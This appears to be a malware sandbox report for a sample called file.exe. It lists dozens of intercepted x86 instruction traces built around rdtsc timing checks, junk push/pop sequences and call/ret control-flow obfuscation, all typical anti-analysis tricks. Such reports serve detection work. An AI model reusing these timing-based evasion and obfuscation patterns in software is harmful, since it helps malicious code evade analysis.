Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14EB238 second address: 14EB287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 xor dword ptr [esp], 26AB09DCh 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F27A8DEEC28h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 lea ebx, dword ptr [ebp+1245A084h] 0x0000002f mov cx, si 0x00000032 xchg eax, ebx 0x00000033 push eax 0x00000034 push edi 0x00000035 pushad 0x00000036 popad 0x00000037 pop edi 0x00000038 pop eax 0x00000039 push eax 0x0000003a jl 00007F27A8DEEC47h 0x00000040 push eax 0x00000041 push edx 0x00000042 jg 00007F27A8DEEC26h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14EB33C second address: 14EB3AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jno 00007F27A8DB97C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e add dword ptr [esp], 6BC77500h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F27A8DB97C8h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f jl 00007F27A8DB97D4h 0x00000035 jmp 00007F27A8DB97CEh 0x0000003a push 00000003h 0x0000003c push 00000000h 0x0000003e sub edx, 6819DBF1h 0x00000044 mov dword ptr [ebp+122D2FF8h], ebx 0x0000004a push 00000003h 0x0000004c cmc 0x0000004d call 00007F27A8DB97C9h 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jp 00007F27A8DB97C6h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14EB3AE second address: 14EB3C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F27A8DEEC2Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14EB3C4 second address: 14EB3FE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ecx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007F27A8DB97CDh 0x00000014 popad 0x00000015 pop ecx 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F27A8DB97D7h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14EB3FE second address: 14EB407 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14EB407 second address: 14EB420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F27A8DB97CDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14EB503 second address: 14EB50E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14EB50E second address: 14EB523 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F27A8DB97C8h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14EB523 second address: 14EB52D instructions: 0x00000000 rdtsc 0x00000002 je 00007F27A8DEEC2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14EB52D second address: 14EB569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F27A8DB97D8h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F27A8DB97D6h 0x00000019 jmp 00007F27A8DB97D0h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14EB569 second address: 14EB56F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14FCCCF second address: 14FCCD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 150B253 second address: 150B257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 150B257 second address: 150B271 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97D4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 150B271 second address: 150B27E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F27A8DEEC26h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 150908B second address: 15090B5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F27A8DB97CEh 0x00000008 pushad 0x00000009 popad 0x0000000a ja 00007F27A8DB97C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F27A8DB97D8h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15090B5 second address: 15090C1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15096E8 second address: 15096EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15096EC second address: 1509716 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F27A8DEEC26h 0x00000008 jng 00007F27A8DEEC26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F27A8DEEC31h 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1509716 second address: 150973E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27A8DB97D3h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F27A8DB97CCh 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15098C9 second address: 15098F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push edx 0x00000007 jmp 00007F27A8DEEC2Dh 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F27A8DEEC32h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1509A24 second address: 1509A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1509A2A second address: 1509A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1509A2E second address: 1509A4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jnc 00007F27A8DB97C6h 0x00000014 push esi 0x00000015 pop esi 0x00000016 je 00007F27A8DB97C6h 0x0000001c popad 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1509E4F second address: 1509E63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F27A8DEEC2Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1509E63 second address: 1509EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27A8DB97D8h 0x00000009 popad 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jg 00007F27A8DB97DDh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14FE3E8 second address: 14FE3EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14FE3EC second address: 14FE3F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 150A911 second address: 150A915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 150A915 second address: 150A922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 150AACE second address: 150AAEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DEEC30h 0x00000007 push edi 0x00000008 jmp 00007F27A8DEEC2Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151110D second address: 1511111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1511111 second address: 1511137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F27A8DEEC3Dh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1514499 second address: 15144E4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F27A8DB97C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F27A8DB97D8h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jp 00007F27A8DB97CAh 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F27A8DB97D1h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15144E4 second address: 15144EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15144EA second address: 15144F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F27A8DB97CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1512C81 second address: 1512C9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DEEC39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1512C9E second address: 1512CA3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151798E second address: 15179AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27A8DEEC36h 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15179AE second address: 15179C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27A8DB97CFh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15179C2 second address: 15179E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F27A8DEEC2Dh 0x00000009 jmp 00007F27A8DEEC31h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15179E4 second address: 15179E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15179E8 second address: 1517A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F27A8DEEC26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 js 00007F27A8DEEC26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1517B6C second address: 1517B72 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1517B72 second address: 1517B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1517F3E second address: 1517F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F27A8DB97D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151C627 second address: 151C62B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151C62B second address: 151C631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151C6ED second address: 151C6F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151C6F3 second address: 151C757 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 747BE172h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F27A8DB97C8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov edi, edx 0x0000002b push ecx 0x0000002c stc 0x0000002d pop esi 0x0000002e call 00007F27A8DB97C9h 0x00000033 push ebx 0x00000034 jg 00007F27A8DB97C8h 0x0000003a pop ebx 0x0000003b push eax 0x0000003c jnl 00007F27A8DB97D0h 0x00000042 mov eax, dword ptr [esp+04h] 0x00000046 push eax 0x00000047 pushad 0x00000048 push edx 0x00000049 pop edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151C757 second address: 151C769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b js 00007F27A8DEEC26h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151D465 second address: 151D476 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151D592 second address: 151D598 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151D598 second address: 151D59D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151D59D second address: 151D5B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F27A8DEEC26h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jnl 00007F27A8DEEC28h 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151DE3F second address: 151DE43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151DE43 second address: 151DE91 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F27A8DEEC26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop ecx 0x00000010 push eax 0x00000011 jnl 00007F27A8DEEC26h 0x00000017 pop eax 0x00000018 popad 0x00000019 nop 0x0000001a movzx esi, di 0x0000001d push 00000000h 0x0000001f mov esi, 2FA21197h 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007F27A8DEEC28h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 00000018h 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 stc 0x00000041 xchg eax, ebx 0x00000042 push edx 0x00000043 pushad 0x00000044 pushad 0x00000045 popad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151E89E second address: 151E8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151E713 second address: 151E754 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F27A8DEEC2Eh 0x00000008 jmp 00007F27A8DEEC39h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F27A8DEEC30h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151E8A2 second address: 151E8A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151E754 second address: 151E758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151E8A6 second address: 151E8C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F27A8DB97D3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151E8C2 second address: 151E8C7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151E758 second address: 151E762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151E8C7 second address: 151E924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 add esi, 44CCD41Dh 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F27A8DEEC28h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a or dword ptr [ebp+122D180Ch], edx 0x00000030 push 00000000h 0x00000032 jmp 00007F27A8DEEC2Ch 0x00000037 xchg eax, ebx 0x00000038 jl 00007F27A8DEEC30h 0x0000003e push eax 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 push ebx 0x00000043 pop ebx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151F91E second address: 151F997 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27A8DB97CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov esi, dword ptr [ebp+122D37EDh] 0x00000010 add esi, dword ptr [ebp+122D36C1h] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F27A8DB97C8h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 mov edi, ebx 0x00000034 sub dword ptr [ebp+122DB582h], eax 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007F27A8DB97C8h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 00000014h 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 jmp 00007F27A8DB97CDh 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 push ecx 0x00000061 pop ecx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151F997 second address: 151F9A1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F27A8DEEC26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151F9A1 second address: 151F9A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 151F9A7 second address: 151F9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1520403 second address: 1520471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F27A8DB97D0h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F27A8DB97C8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 push 00000000h 0x00000029 movzx esi, cx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F27A8DB97C8h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 clc 0x00000049 push eax 0x0000004a push eax 0x0000004b jc 00007F27A8DB97CCh 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1520155 second address: 1520159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1520159 second address: 1520167 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F27A8DB97C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1520EEB second address: 1520EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1520167 second address: 152016B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1520EF0 second address: 1520EF5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1520EF5 second address: 1520F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d push eax 0x0000000e and edi, 07DF5DCFh 0x00000014 pop esi 0x00000015 pop esi 0x00000016 push 00000000h 0x00000018 add di, CAA6h 0x0000001d push eax 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 ja 00007F27A8DB97C6h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1521A13 second address: 1521A17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
